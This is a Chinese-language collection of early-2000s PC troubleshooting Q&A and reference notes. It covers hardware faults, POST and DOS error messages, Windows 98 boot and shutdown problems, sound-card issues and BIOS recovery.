    问：我以前使用的操作系统是Windows 98，在安装一些游戏时需要反复安装几遍才行。最近我把系统换成了Windows 2000，并安装了Intel IAA驱动，装好后发现许多游戏都安装不上了。回想使用Windows 98时，光驱的DMA功能没有选中，游戏能够安装；而在Windows 2000下我根本找不到DMA选项，不知问题是否出在此处？

    答：如果能够排除光驱自身读盘能力下降的因素，那么此问题多半是由Intel IAA驱动引起的。因为IAA驱动会自动将光驱的DMA功能打开，而一些早期的光驱并不支持DMA或支持的不好，这样就会导致光驱的读盘能力下降或出现各种莫名其妙的问题。解决方法很简单，将Intel IAA驱动卸载即可。

    问：最近我新买了一条Kingston的128MB SDRAM内存，单面、有四块内存芯片（32MB×4）。插在主板（MSI 6199，Intel BX芯片组）上后，系统只能检测到64MB，而在朋友的电脑上则能正常检测到128MB。请问是何原因？

    答：据了解，这种单面4芯片的内存在很多早期的主板上都无法正常使用，其中就包括采用Intel BX芯片组的主板。你可以将主板的BIOS升级至最高版本试一试，如果不行的话就只能更换内存了。

    问：我的机械鼠标总是不太灵敏，怎样才能解决这一问题呢？

    答：多数情况下，鼠标不灵敏与内部积垢有关。这种情况在机械鼠标上表现最为明显，多半是灰尘或其他杂物通过鼠标的滚球带入鼠标内部，附着在里面的几个滚轴上，时间长了就会导致鼠标的移动精度下降。你可以打开鼠标底部的盖子，取出滚球，清除里面滚轴上的污垢，并将滚球清洗干净，这样即可解决问题。

    问：本人爱机是个老古董，Celeron 400MHz CPU、VIA 693芯片组主板（Slot 1接口）。最近想升级换个CPU ，查看说明书得知主板支持100MHz 外频、8倍频，也就是说最高能支持800MHz CPU。于是买了一个转接卡（支持66/100/133MHz 外频）和CeleronⅡ 850MHz CPU（没有Celeron 800MHz了）。装好转接卡和CPU，在自检时发现CPU被识别成了PentiumⅢ 851MHz（189MHz×4.5），不但多出了50MHz，而且外频居然达到189MHz!请问是何原因？

    答：首先要说明的是，Intel CPU的倍频是锁定的（除了极少量工程样品），不管如何设置，你的CeleronⅡ 850MHz CPU的倍频都是8.5。主板之所以会把你的CeleronⅡ 850MHz识别为PentiumⅢ 851MHz（189MHz×4.5），是因为它推出的时间较早，不能正确识别CeleronⅡ所致。

    这并不会影响你正常使用，如果看着不舒服的话，可以尝试升级主板的BIOS，如果新版本的BIOS能够支持CeleronⅡ的话即可解决问题。

    问：本人爱机的CPU是P4　2.4GHz，据说前端总线速度是533MHz，但使用Windows优化大师5.1检测时显示的外频却是133MHz，请问是何原因？

    答：P4的前端总线和外频是不一样的，确切地说前端总线是外频的4倍。P4的外频一般有100MHz和133MHz两种，对应的前端总线分别为400MHz和533MHz。优化大师显示的是外频，133MHz外频即表示533MHz的前端总线速度。


硬件诊室

《一键清理系统垃圾》

硬件诊室

《中国电脑教育报》练兵

    问：近日，我的爱机出了一点问题，每次玩完游戏后，屏幕颜色都会由默认的蓝色变成绿色。我的显卡是GeForce3 Ti 200，请问是何原因？

    答：这种情况多出现在退出某些大型3D游戏之后，桌面的分辨率、背景色彩等被改动，如果不重新对桌面进行设置或重启计算机就改不回来。此问题可以从三个方面来考虑：

    1、显卡驱动程序不完善。

    解决方法比较简单，更换口碑比较好，最好是经过微软认证的驱动程序。

    2、游戏Bug。

    这就需要游戏公司推出相应的补丁程序了。

    3、显卡自身质量不佳。

    可以尝试升级显卡的BIOS，但操作前请做好备份工作，以便在出现意外情况时能够进行恢复。

    问：单位一台商用电脑，硬盘为20GB，但只有一个分区C，已用空间为10GB，怎样才能在不损坏现有分区内容的基础上，增加一个分区D，容量在5GB左右？

    答：你可以使用PartitionMagic这款软件，即硬盘分区魔术师，www.ccidnet.com/soft/cce提供了该软件的下载链接。在使用之前，建议先作一遍磁盘碎片整理并备份重要数据以防万一。

    运行PartitionMagic，在所示的C分区上点击鼠标右键，选择“调整容量/移动”，在随后出现的对话框中将“新建容量”设为15GB（不可小于已有数据的容量），点击确定。随后PartitionMagic会将剩余的空间以灰色标示出来，在上面点击鼠标右键，选择“创建”，在其中设定分区格式等信息（请根据个人情况进行调整）。设定完成并确认无误后，点击界面左下角的“应用”按钮，PartitionMagic即开始根据你的要求进行修改，这个过程所需的时间会比较长，请保持耐心。

    问：我想在ADSL线路上安装电话分机或其他设备该怎样安装？

    答：ADSL滤波分离器最好接在电话线入户端，再从分离器分出的电话口来扩展电话分机。当然接在分机口理论上也可以，但是这样就在电话线入户端和分离器之间并入了其他电子设备(电话)，这些设备会对ADSL的通讯造成干扰，由于ADSL对线路品质要求很高，有可能影响ADSL的正常工作，所以一般都在分离器出来的线路之后再安装分机。

    问：本人有一台刻录机，在执行BIOS升级程序时，提示找不到刻录机，不知是何原因？

    答：目前很多刻录机在执行BIOS升级程序时，都需要在纯DOS模式下来完成。这就需要刻录机的DOS驱动程序的支持，你所遇到的情况就是没有采用正确的刻录机驱动程序所致。解决方法非常简单，找出刻录机配套的光盘或软盘，上面一般都会提供DOS下使用的驱动程序，安装好即可。

    问：近日使用爱机时，发现系统桌面任务栏中的小喇叭图标不见了，爱机变成了“哑巴”。重装声卡驱动无效，请问该如何解决？

    答：引起这种故障的可能性很多，如硬件冲突、病毒破坏、声卡驱动丢失等。你可以通过下面的方法来解决：

    1、查杀病毒。

    2、检查声卡的安装情况。如声卡的安装是否到位，是否与其他硬件存在资源冲突等。

    3、重新安装驱动程序。具体方法可参见本报2003年A16版《常见声卡故障问答集锦（一）》一问。


硬件诊室

《一键清理系统垃圾》

硬件诊室

《中国电脑教育报》

    问：我想安装ADSL，但是担心电话质量会下降。另外，打电话是会导致上网速度下降吗？

    答：不会，ADSL设备在设计上已经考虑到这一点，使用了分频复用的技术将电话音与数据流分开，互相不干扰。在实际线路的测试中，安装ADSL的电话与普通电话的语音没有任何区别。而在传输数据信息的时候，提起话机、挂断电话及随意通话，传输速率保持不变。

    问：我的爱机是P4 赛扬 1.7GHz CPU、技嘉GA-8IG主板、爱国者机箱和电源，不知为什么老是自动断电（不是重启）。已排除电源和CPU风扇问题，请问是何原因？该如何解决呢？

    答：请查看一下主板BIOS中关于“CPU温度报警”一项的设置，如果在该项中设置了当CPU超过一定温度就自动关机的话，请将此温度设定在一个合理的数值上，当然这需要根据具体的使用环境而定。使用P4赛扬，将此温度设定在70℃是比较合理的。

    另外补充一点，不同主板所测出的CPU的温度可能会有较大的差距，如果用手实测CPU温度时并不是很热，而BIOS中报告的CPU温度却很高，则可以通过适当调整“CPU温度报警”的温度上限来解决问题。

    问：我朋友的品牌机进不了主板的BIOS，按键盘上的“Delete”键无效，请问是何原因？

    答：进入主板BIOS的方法并非只有按“Delete”键一种，早期的很多主板都是通过按键盘上的“F1”或“F2”键进入BIOS的，具体应该按哪个键在出现主板信息或品牌LOGO时会有提示信息。个别品牌机可能不会出现类似的提示信息，遇到这种情况时，可在出现品牌LOGO时按键盘上的“Tab”键，这样即可以看到主板的信息及进入BIOS的方法了。

    问：我遇上了个怪问题，近来爱机（安装的是Windows 98操作系统）的“光驱图标”无缘无故多了一个（真正的光驱图标排在其后），可我并没有装任何虚拟光驱软件！系统属性里显示该光驱为DVD-ROM，并有相应的驱动程序。我无法将该光驱删掉！请问是何原因？

    答：从该光驱的属性看，应该是Deamon Tools虚拟出来的光驱，估计是因为你最近误装了某些伪正版游戏软件所致。这些游戏软件只是将需要读取的光盘上的文件做成了光盘镜像，然后用Deamon Tools虚拟成光驱，这样就成了所谓的“硬盘版”。你可以先通过游戏提供的“Uninstall”命令将游戏删除，如果多余的光驱图标依然存在，请在系统中查找“Deamon”字段，找到Deamon Tools所在的路径后，同样采用其所提供的Uninstall”命令将其删除，这样问题应该可以解决。


硬件知识

《一键清理系统垃圾》

硬件知识

（一）、开机检测：
1、 打开主机电源：出现BIOS画面则表示主机没有大问题，如没有，则须打开机箱检查。
⑴ 如果显示器亮，主机电源指示灯不亮，风扇不转：一般为开关电源故障或主板短路
⑵ 如果主机指示灯全亮，电源风扇正常，无显示；
如果有BIOS错误声音提示，根据声音判断故障位置。
⑶ 如没有BIOS声音提示，一般为主板或CPU故障。
⑷ 对CMOS放电，恢复BIOS默认设置
⑸ 去除所有接口卡和数据线（最小化测试）
⑹ BIOS故障
(BIOS中内存参数或主频设置错误)
BIOS程序被病毒破坏
BIOS升级失败
⑺ 如果BIOS自检声音正常，一般为显示器未连接或损坏。
2、 内存检测和实际容量不一致。
⑴ 接触不良
⑵ 若有两条以上，不兼容
⑶ 主板芯片组不支持
⑷ 内存条物理损坏
3、 内存自检中途死机
⑴ 芯片组特性中内存参数设置错误
⑵ 内存条物理损坏
4、 检测不到光驱或硬盘
⑴ 数据线损坏或连接错误
⑵ 硬盘跳线没有设置好
⑶ 硬盘本身问题或IDE接口故障
5、 忘记CMOS密码
⑴ 通过跳线短路或电池短路给CMOS放电
⑵ 利用DOS调试工具
（二）、POST自检过程错误提示：
(1) BIOS ROM checksum error-System halted（BIOS ROM校验和失败，系统挂起）----BIOS ROM的程序资料已被更改，通常由BIOS升级错误造成
(2) CMOS Battery state low(CMOS电池电力不足)----主板电池提供CMOS存储器， 用来存储BIOS参数。电池电压不足，需要更换。CMOS跳线短路
(3) CMOS checksum Failure (CMOS校验失败)----CMOS数值保存之后，便产生一个校验和值，供错误检测用。如果先前的值与当前读数据产生的实际值不同 ，就出现这个错误信息。为了纠正这个错误， 应运行BIOS设置程序。电池掉电或病毒
(4) CMOS System Options Not Set (CMOS系统选择项没有设置)----存储在CMOS中的数值遭破坏， 或者不存在了。运行BIOS设置程序来纠正这个错误。
(5) Keyboard Error(键盘错误)----BIOS遇到由键盘引起的定时问题， 应保证系统中安装了键盘。也可以在标准CMOS设置项中选跳过键盘POST程序。
(6) Memory Test Fail(内存测试失败)----内存条安装不牢或损坏。
(7) Floppy Disk(s) Fail(软盘失败)----软驱数据线、电源线连接不好或软驱损坏。
(8) FDD controller Failure(软盘控制器失败)----BIOS 不 能与软磁盘驱动器的控制器传输数据。关闭系统电源后， 检查所有有关的连接器。接口损坏加多功能卡。
(9) HDD Controller Failure(硬盘控制器失败)----BIOS不能与硬盘驱动器的控制器传输数据。关闭系统电源后，检查所有有关的连接器。
(10) C:Drive Error(C：驱动器错误)----BIOS没有接收到硬盘C：来的回答信号。检查数据线和CMOS设置项中选择的硬盘类型。
(11) C:Drive Failure (C：驱动器失败)----BIOS不能得到硬盘驱动器C：的回答信号。这可能要更换硬盘。
(12) Cache Memory Bad ,Do Not Enable Cache (Cache 存贮器损坏)――BIOS发现系统板的Cache 存贮器损坏。与系统生产厂家联系或关闭CMOS中设置。
（三）、DOS错误提示：
（1）Insert disk with COMMAND.COM in dive A
Press any key to continue
计算机找不到DOS外壳,在驱动器A中插入系统盘。或者从硬盘上启动，取走A驱动器中的 DOS软盘。文件损坏或SHELL设置错
（2）Invalid media or Track 0 bad disk。（无效介质或０磁道损坏）
0磁道的主引导扇区被破坏了，磁盘不能再在上面存储任何重要信息。低格
（3）Access denied（访问被否定）
对一张有写保护的软盘进行写操作或试图删除硬盘上受保护的文件。
（4）Drive not ready
Abort, Retry ,Ignore, Fail?（放弃，重试，忽略，失败）
计算机在驱动器中找不到磁盘。检查软盘及驱动器，CMOS中设置的软盘类型，确信软盘在正确的驱动器中以后按R重试。
（5）Insufficient memory（内存不足）
计算机没有足够的内存来运行这个特殊的程序，或者可能是由于存储器的设置不对造成的。请扩充内存或重新设置系统后再启动。
（6）Bad command or file name
在提示符下输入乱字符DOS不能识别，输入命令时拼写有误，或者是DOS在路径下找不到所输入的程序名。如是在启动时看到这些，那么就是计算机不能理解AUTO执行.BAT中的某一个命令行。
（7）Not found any active partition in HDD
在硬盘上没有发现活动分区,分区时忘记设置活动分区，重新运行FDISK并把基本分区激活。
（8）Error loading operating system（引导操作系统错误）
DOS引导扇区有物理损坏，重新分区或低格
（9）Missing operating system（操作系统丢失）
C盘DOS引导记录中标志位丢失，或硬盘执行完FDISK后没有格式化，或CMOS中硬盘参数设置错误，软盘启动后执行SYS C：可恢复系统文件和标志位
（10）Non-System disk or disk error（非系统盘或盘错误）
引导程序找不到IO.SYS和MSDOS.SYS，属性错误或数据区的系统文件不同。用软盘引导，键入SYS C：传DOS的系统文件,不行重分区。
（11）Disk boot failure，Insert System Disk And Press ENTER (磁盘引导失败，插入系统盘并敲回车)
读系统盘错误，一般为硬盘接口损坏或主引导记录中标志位丢失损坏。软盘引导，Fdisk/mbr恢复
（12）Invalid drive specification (无效的盘规格)
盘符输入错误，或磁盘未格式化。若无法从硬盘引导，从软盘启动后进入C盘时出此提示则表示分区表丢失了
（13）No partition bootable（没有可引导分区）
硬盘安装完后没有分区就会出现上述错误信息。只要用WIN98启动盘重新开机，然后执行FDISK来分区。
（四）、WIN98系统故障
1、 WIN98无法进入安全模式：保护模式驱动程序错误
（1） 在98启动菜单中选择日志模式Logged，生成开机日志文件
（2） 死机后重启，在启动菜单中选择字符模式Command Prompt Only
（3） 编辑BOOTLOG.TXT，查找加载失败FAIL的文件
（4） 进入WIN98安装备份的目录，使用EXTRACT命令恢复加载失败的文件
（5） D:\PWIN98\>EXTRACT /A BASE5.CAB 1234.567 /L C:\WINDOWS\SYSTEM
2、 WIN98可以进入安全模式，可以运行“系统信息”工具中的“系统配置实用程序”检测
（1） 选中“选择性启动”，取消所有选项
（2） 重启后如果仍然不能进入WIN98，表示32位保护模式驱动故障，即注册表登录错误。重启后进入字符模式，利用SCANREG程序恢复。
（3） 如果可以进入WIN98，就在“选择性启动”中逐项加载“启动组”、WIN.INI、SYSTEM.INI、AUTO执行.BAT
（4） 如果实模式驱动程序出错，重启后选择单步模式即可找到故障程序。
（5） 如果16位保护模式驱动程序出错，则WIN.INI、 SYSTEM.INI加载时故障。
（6） 如果各类驱动分别加载时正常，同时加载时死机，则实模式驱动与保护模式驱动冲突。
3、 WIN98不断重复开机
（1） 重启后进入安全模式
（2） 选择控制面板-系统-设备管理器-系统设备-PCI BUS-IRQ指导
（3） 取消“实用IRQ指导”功能
4、 WIN98启动时出现错误信息
CANNOT FIND A DEVICE FILE THAT MAY BE RUN WINDOWS OR A WINDOWS APPLICATION
THE WINDOWS REGISTRY OR SYSTEM.INI FILE REFER TO THIS DEVICE FILE，BUT THE DEVICE FILE NOLONGER EXISTS
…
****.VXD(或DLL/DRV/386)
PRESS A KEY TO CONTINUE
注册表或SYSTEM.INI找不到某个设备驱动程序
（1） 记下文件名，如果文件扩展名为VxD、DLL、DRV，则此文件可能为win98的驱动文件
（2） 启动WIN98后使用系统信息的工具中的系统文件检查器，从安装盘提取该文件
（3） 如果提取时提示找不到文件，则此文件是应用程序的驱动文件
（4） 运行REGEDIT，查找与提示文件相关的主键或键值，并全部删除
（5） 如果文件扩展名是386，则一般是应用程序文件，且在SYSTEM.INI中加载，运行SYSEDIT或系统配置实用程序，去掉和此文件相关的语句
5、 动后马上出现"安全关机"：Windows外壳文件EXPLORER.EXE丢失
(五)、WIN98应用程序故障
1、 运行软件时出现蓝屏，提示：A FATAL EXCEPTION 0D HAS OCCURRED AT ****:********.THE CURRENT AOOLICATION WILL BE TERMINATED.（一个致命错误发生，当前应用程序将被终止），有多种可能
（1） 软件安装时出错，导致软件安装不完全。
（2） 软件设计时存在BUG，安装补丁程序或升级软件
（3） 软件冲突，卸载某个软件
（4） 删除软件时误删除了共享的文件。
（5） WIN98系统不稳定：运行磁盘清理、磁盘扫描、碎片整理
（6） 内存条或硬盘等存在物理损坏
2、 启动应用程序时软件不能正常启动：按CTRL+ALT+DEL关闭程序
3、 页面错误：虚拟内存置换页面时出错，一般和硬盘、注册表有关
4、 程序执行时提示该程序执行了非法操作（即GENERAL PROTECTION FAULT常规保护性错误）：应用程序BUG或文件出错，重新运行该程序。
5、 执行程序时提示“该程序不是有效的WIN32应用程序”：一般为病毒破坏或程序本身错误。
6、 Windows 98 无法正常关机（死机或蓝屏）：win98 关机时先停止接受所有写盘操作的请求， 然后把未写入磁盘的磁盘缓冲区写盘，接着关闭所有正在运行的程序，最后将所有保护模式的驱动程序转换到实模式。可能会导致错误的原因有：
（1） 在实模式下，显卡没有分配到IRQ
（2） 一个驻留内存的TSR（常驻内存程序）不能正确地退出
（3） 有冲突的驱动程序
（4） 退出Windows 时设置了关机声音，而这个声音正好是个损坏的声音文件
（5） 有问题的硬件或硬件设置有误
（6） 与BIOS设置有冲突
（7） 主板的APM 或ACPI 电源管理与系统的电源管理程序有冲突
（8） 快速关机功能打开了
如果无法确定具体的原因，可以按下列解决方案逐个尝试
（1） 检查电脑硬件的配置，包括BIOS 的设置。在BIOS设置中，请将 “Assign IRQ for your Video Adapter”这条设置为“Enable”，它可以让BIOS 为你的显卡预留IRQ。有的BIOS 还有个USB开关，它问你是否使用USB，通常它是关闭 的，但有时将USB 设置为“Enable”也能解决问题，即使你没有任何USB 设备。
（2） 检查有哪些程序正在运行和启动时要运行的，包括在DOS下就装入的程序。运行系统配置实用程序（或在开始菜单“运行”“MSConfig”，MSConfig 提供系统启动程序的列表，还有 Config.sys 文件的内容。把那些不必要的程序禁止运行。
（3） 想关机却变成了重新启动。大多是“快速重新启动”开关在作怪。在开始菜单选择“运行”，输入“MSConfig”，点击“高级”按钮，里面有个“禁止快速关机”，打上勾。也可以通过注册表修改，打开注册表到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Shutdown，把右边的FastReboot 由1 改成0。
（4） 在关机时BIOS 和Windows 之间可能存在不协调问题，修改Windows，让它不使用 PnP BIOS。重新启动时按住Ctrl 不放，选择菜单第5 项目启动到DOS，进入 Windows\system，然后将Bios.vxd 文件改名为Bios.old，再重新启动，试试这回关机是否成功。
（5） 上面的方法都无效的话，请打开控制面板的“系统”属性，切换到“设备管理器”， 看有没有黄色的叹号，下面是问题出现较多的设备，检查它们的资源有无冲突的地方：显示适配器、磁盘驱动器、软盘控制器、键盘、鼠标、网络适配器、PCMCIA 接口、SCSI 控制器、端口（COM & LPT）、声音、视频和游戏控制器
（6） 试试禁止NVRAM/ESCD：
（7） 此项目关系到BIOS 与Windows 在开机与关机时如何工作。打开控制面板的“系统”， 切换到“设备管理器”的“系统设备”，选择“即插即用BIOS”，转到“设置”一栏， 会看到“禁止NVRAM/ESCD 更新”，请打上勾。
（8） 更改IRQ的分配：打开控制面板的“系统”，切换到“设备管理器”的“系统设备”，选择“PCI bus” 并切换到“设备”栏，看到两个选择：“使用硬件”和“使用BIOS”，尝试更换它 们，并重新启动电脑。注意，这里的修改都需要重新启动才能验证是否成功。
（9） 如果不行，继续在“PCI bus”那里，切换到“IRQ指导”栏，如果“使用IRQ指导”上 打着勾，表示由Win98 自己来管理PCI设备，要是关闭它，则由电脑BIOS 程序来管理 IRQ。IRQ 指导是个总开关，它由四个小开关组成，从上往下试验：关闭“使用 ACPI BIOS获取IRQ表格”，问题依旧再关闭“使用MS性能表获取IRQ表格”，要是某个 PCI 设备工作不太正常则打开“从保护模式PCIBIOS 2.1调用中获取IRQ表格”。
(10)更新电脑的BIOS 和主板的驱动程序，如果产品有问题，生产厂商肯定会更新它们的驱动程序，特别是Win98面世之前的产品，也可能是产品不能搭配某些配件，只有新的驱动才能解决。

*注：要养成提前备份的好习惯
1、备份注册表
2、备份系统分区（ghost）

二、硬件故障：
1、光驱：
（1） WIN98启动后找不到光驱：用WIN98软盘启动盘启动，若光驱仍不能使用，为硬件故障，检查数据线、接口和光驱；如果光驱在DOS下工作正常，一般是IDE接口驱动损坏
（2） 光驱不读盘：光盘盘片划伤或灰尘太多，激光头功率不足，光驱主轴不稳固导致盘片抖动，光头污染
（3） 光盘不转：激光头过脏；主轴马达故障；盘片格式不兼容
2、 打印机：
（1）不打印：驱动程序损坏，后台打印设置错误或端口损坏
（2）打印乱码：打印电缆损坏或病毒破坏
3、硬盘：
（1） 接口损坏：使用多功能卡
（2） 认道不准、坏道：低格
（3） 数据线
（4） 盘体损坏：更换硬盘
4、显示：
（1） 缺色：数据线断针
（2） 滚屏：显示器垂直同步电路故障
（3） 亮度低：显示器内部元件老化
（4） 局部花屏：显存有物理损坏
5、声卡：
（1）无法正常安装
早期的声卡在安装过程中比较麻烦，需要改动各种跳线和进行比较复杂的软件设置。后来随着“PnP”即插即用技术的广泛运用，声卡的安装被简便化，但依然有不少中小厂商设计的产品在安装过程中会出现这样那样的麻烦。或是Win98系统无法正确识别声卡，或是无法正确设置中断号，出现设备冲突。如今流行的PCI声卡则已经比较好的解决了这些问题。鉴于眼下还有许多用户在使用ISA声卡，我们有必要对这类无法安装的故障进行探讨。
当系统属性中“惊叹号”频频的时候，就是遇到设备冲突问题了，这在ISA声卡中是非常常见的毛病。这时候我们可以手动调整声卡的各种设置属性，一般正常情况下ISA声卡的输入/输出范围是在0220-022F之间，直接内存访问是01，而中断请求通常是05或者07。用户可以按照这个标准上下微调，直至解决系统冲突。
驱动程序的质量对于声卡的安装难易程度也有很大影响，而且Win 9X有自动检测即插即用设备并自动安装驱动程序的特性。如果安装的这个驱动程序偏偏不能正常使用，这就麻烦了。以后，每次当你删掉设备重新启动后，Windows都会自动匹配原来的驱动程序，并且不能用“添加新硬件”的方法解决。此时我们可以进入Win9X\inf\other目录，把与声卡相关的inf文件统统删掉，再重新启动后用进行手动安装。这一招时非常有用的。
（2）PCI声卡在WIN98下使用不正常
有些时候在声卡驱动程序安装过程中一切正常，也没有出现设备冲突，但在WIN98下面就是无法出声或是出现其他故障。这种现象通常出现在PCI声卡上，请检查一下安装过程中您把PCI声卡插在的哪条PCI插槽上。有些朋友出于散热的考虑，喜欢把声卡插在远离AGP插槽，靠近ISA插槽的那几条PCI插槽中。问题往往就出现在这里，因为Windows98有一个Bug：只能正确识别插在PCI-1和PCI-2两个槽的声卡。而在ATX主板上紧靠AGP的两条PCI才是PCI-1和PCI-2（在一些AT主板上恰恰相反，紧靠ISA的是PCI-1），所以如果您没有把PCI声卡安装在正确的插槽上，问题就会产生了。
（3）声卡无声
如果声卡安装过程一切正常，设备都能正常识别，也没有插错槽，但却依然无法发出任何声音，这就要从一下几个方面来检查了。
1.与音箱或者耳机是否正确连接。
2.音箱或者耳机是否性能完好。
3.音频连接线有无损坏。
4.Windows音量控制中的各项声音通道是否被屏蔽。
如果以上4条都很正常，依然没有声音，那么我们可以试着更换较新版本的驱动程序试试。如果还不行则可把声卡插到其他的机器上进行试验，以确认声卡是否损坏。
（4）播放MIDI无声
如果声卡在播放wav、玩游戏时非常正常，但就是无法播放MIDI文件则可能有以下3种可能：
1.早期的ISA声卡可能是由于16位模式与32位模式不兼容造成MIDI播放的不正常。
2.如今流行的PCI声卡大多采用波表合成技术，如果MIDI部分不能放音则很可能因为您没有加载适当的波表音色库。
3.Windows音量控制中的MIDI通道被设置成了静音模式。
（5）播放CD无声
如果无法正常欣赏CD唱片，最大的可能就是没有连接好CD音频线，这条4芯线是CD-ROM和声卡附带的。线的一头与声卡上的CD IN相连，另一头则与CD-ROM上的ANALOG音频输出相连。需要注意的是早期声卡上CD IN类型有所不同，必须用适当的音频线与之配合使用。
（6）无法录音
在麦克风和声卡连接正常的情况下，无法录音通常是由于用户没有这设置好录音通道所造成的。在Win98中您可以到控制面板=〉多媒体=〉音频=〉录音首选设备，点击那个麦克风小图标就可以进入“录音控制”了，在这里您可以预置好您需要的录音通道，随后就可以尽情录音了。
（7）噪音
廉价的低档声卡往往在放音时会出现较大的噪音。这是由于这些产品往往采用了比较廉价的功放单元，同时在做工上也不能令人满意，很容易受到电磁干扰。一般这类声卡往往有一个Speaker out、Line out的切换跳线。Speaker out表示采用声卡上的功放单元对信号进行放大处理，通常这是给无源音箱使用的，虽然输出的信号“大而猛”，但信噪比很低。Line out则表示绕过声卡上的功放单元，直接将信号以线路传输方式输出到音箱，这样廉价声卡的噪音问题就可以得到适当的解决。
（8）爆音
这里探讨的“爆音”特指声卡在放音过程中出现的间歇干扰声，而不是诸如信噪比低而引起的信号“噪音”。爆音问题主要出现在PCI声卡上，主要是由于PCI BUS Master控制权引起的，并在PCI显卡与PCI声卡共同工作的电脑中显得尤为突出。其“病症”通常是：在PCI声卡处理声音信息的同时，运行其他大型的应用程序，在诸如下拉菜单滚动条，使图形画面出现变化的时候，会发出间歇的“噼啪”声。究其更本原因，其实是PCI显卡在作怪。由于当时显卡制造厂商为了最大程度的提升自己产品在运行Winbench之类软件时的图形测试分值，往往将PCI显卡设置为BUS Master的方式。在放音时，画面有所动作，显卡瞬间抢过了PCI BUS Master的主控权，势必造成PCI声卡受到干扰，以至出现瞬间的爆音。如果是AGP接口的显卡则不会有这类困扰，且也并非所有的PCI显卡都有抢夺PCI BUS Master主控权的“恶习”。这类原因引起的爆音是可以非常容易被解决的——在Windows安装目录下找到system.ini文件，对其进行编辑，我们可以试着添加或寻找这样两段语句：
[display]
busthrottle=1
optimization=1
如果已经有了这两段话，则一定要注意将busthrottle和optimization后面的变量设置为“1”。如果您的PCI声卡爆音来源于BUS Master控制权的争夺，那么修改了以上设置，重新启动机器以后，应该可以解决问题了。
另外（请使用健康词语） Live声卡与VIA主板的兼容问题，CD-ROM的数字音频输出等也会引起爆音，这里我们就不详细讨论了。
（9）不能正常使用四声道
某些声卡号称支持4声道，但使用中有时不正常，譬如（请使用健康词语） PCI 64和PCI 128。具体表现为在玩游戏时4个音箱可以同时发音，但在听MP3或是CD的时候，却只有前面的两个音箱有声音。其实这主要是因为这类声卡的4声道是需要DS3D支持的。在DS3D环境下可以正常使用，而到了非DS3D环境下只有立体声输出。也可以说，这类声卡的4声道不是真正的4声道，而是通过软件模拟的。

三、环境
1、 温度：15--35，温度过低软驱容易发生读写错，过高系统部件不稳定
2、 湿度：40％--60％，过高元件氧化生锈，过低容易因放电造成静电损坏
3、 洁净度：灰尘过多造成散热不良，板卡接触不良，软驱、光驱读盘错
4、 电磁干扰：尤其是显示器容易
5、 稳压电源：电压过低或不稳容易产生随机黑屏
6、 静电：计算机机房应安装防静电地板
7、 地线：
电源地：单相电源中零线
大地：通过导线接地
屏蔽地：机壳地、防电磁干扰或静电，接地
信号地：机内电路运转参考点，接直流电源公共端

四、BIOS升级失败
1、编辑可执行文件法。正如上面笔者提到的那样，主板BIOS中最重要的BLOCK模块并没有受到CIH的攻击，而这一模块本身就具有开机的功能，因此我们就可以通过编辑可执行文件，达到恢复BIOS的目的了。
1） 制做一张DOS系统盘，将该损坏主板型号的BIOS文件和驱动刷新BIOS的文件（一般都由AWARD提供，多数名称就是AWARD．EXE）拷贝到该软盘上。
2）在根目录下编辑一个AUTO执行．BAT文件。在这个文件中，写下如下几行命令：
@echo off
a:\AWARD.exe XXXXXXX.bin ；XXXXXXX为该损坏主板的BIOS文件名
3）将电脑开机，插入该系统盘到软驱中，只要你的软驱不是损坏的，那么一般都能够完成主板的BIOS修复工作。

这种方法，其实是利用了主板上CMOS芯片中除BIOS程序以外的BLOCK模块的功能。根据IBM在1980年推出PC时制定的规则，电脑的主板在由BLOCK模块引导开机时，必须由ISA显卡驱动才能显示出图像。而且，BLOCK作为一个固定模块，存储在ROM中。由于CIH只能破坏EPRAM，因此对BLOCK无能为力，当然也就可以令我们轻松搞定恢复BIOS了。

2、热插拔法：
注意，这种方法只适用于对电脑硬件或者电子产品非常精通的人。
1）准备工具，一把螺丝刀（小号），一个摄子。
2）打开损坏电脑的机箱后盖，将主板上的BIOS芯片用摄子和螺丝刀撬下来。注意，用力一定要均匀，千万不要让BIOS
芯片的40个插针出现断针或者是扭曲。
3）以同样的方法从另一台同样类型的主板上拆下一个没有损坏的BIOS芯片，插在该损坏主板上。注意，在插的时候，
也要做到用力均匀。
4）开机进入DOS环境，执行AWARD．EXE，将该完整的BIOS芯片内容备份到一张软盘上。
5）在开机状态下，用螺丝刀将该主板上的BIOS芯片带电拆下。这一过程千万要注意的是，不要将螺丝刀的金属部分触
到主板的其它部分，否则容易使主板形成短路，造成主板的彻底损坏。
6）将损坏的BIOS芯片插入到该工作电脑的BIOS芯片槽中，再次执行AWARD．EXE文件，将刚才备份的文件回写到该
BIOS芯片中。
7）重新启动机器，如果机器仍然可以工作的化，那么就证明我们的BIOS修复成功。不过，最好进行到BIOS设置中，
调用默认的BIOS设置方式。再重新启动一次，以便于机器能够正常工作。
这种方法，是利用主板BIOS只是在每次开机或者启动时驱动，其余时间都闲置的工作方式来完成主板BIOS芯片的修复的。不过，相比较前一种方法，它的危险系数相对大一些。因此，我们在这里不推荐您使用这种方法
三. (一)BIOS信息部分：
升级主板BIOS，找主板的信息：
开机，计算机进行内存自检时（屏幕左上角出现变化的字符串）按Pause键使屏幕暂停滚动观察最下端有一排由数字字母符号组成（BIOS序列号）如:”10/16/97-i430TX-AL513X2A59If3Bc-00"(AWARD BIOS格式）或"40-01S5-ZZ1124-10101111-060691-OPWBSX-F"(AMI BIOS格式）若BIOS是AWARD格式，倒数第二位（AL513X2A59If3Bc）若是AWI可记录完整序列号到相关站点升级。
②如果主BIOS 正常工作，则按照一般程序进行系统引导工作，屏幕显示：“The Primary BIOS is ready”，表明主BIOS 处于正常工作状态，并提示按F1 键可以进入BIOS 维护程序。
③如果在第①步检测到主BIOS 失效，则会有短暂的黑屏，屏幕上出现“Primary BIOS is not ready”，这是提示用户主BIOS 引导已经失效了。
④系统启用备用BIOS，利用备用BIOS 继续完成系统引导工作，屏幕出现“F1 to go to recovery utility”的提示，提供给用户的一个选择，用户可以选择是继续完成系统引导还是立即修复主BIOS。
⑤如果用户在第④步时没有按下F1键，也就是选择忽略主芯片的问题，系统将利用备用BIOS 完成引导工作。
⑥如果用户在第④步时按下F1 键后，系统将调用BIOS修复工具，立即对主BIOS 进行修复，并且重新启动，再按上述过程进行系统的引导工作，将一切恢复到原来的状态。
注意：在第①步中，如果主BIOS 正常而备用的BIOS 出了问题，系统也会提醒用户，同样，用户也可以选择是用主BIOS 来维持系统的运行，还是利用主BIOS 修复备用BIOS。
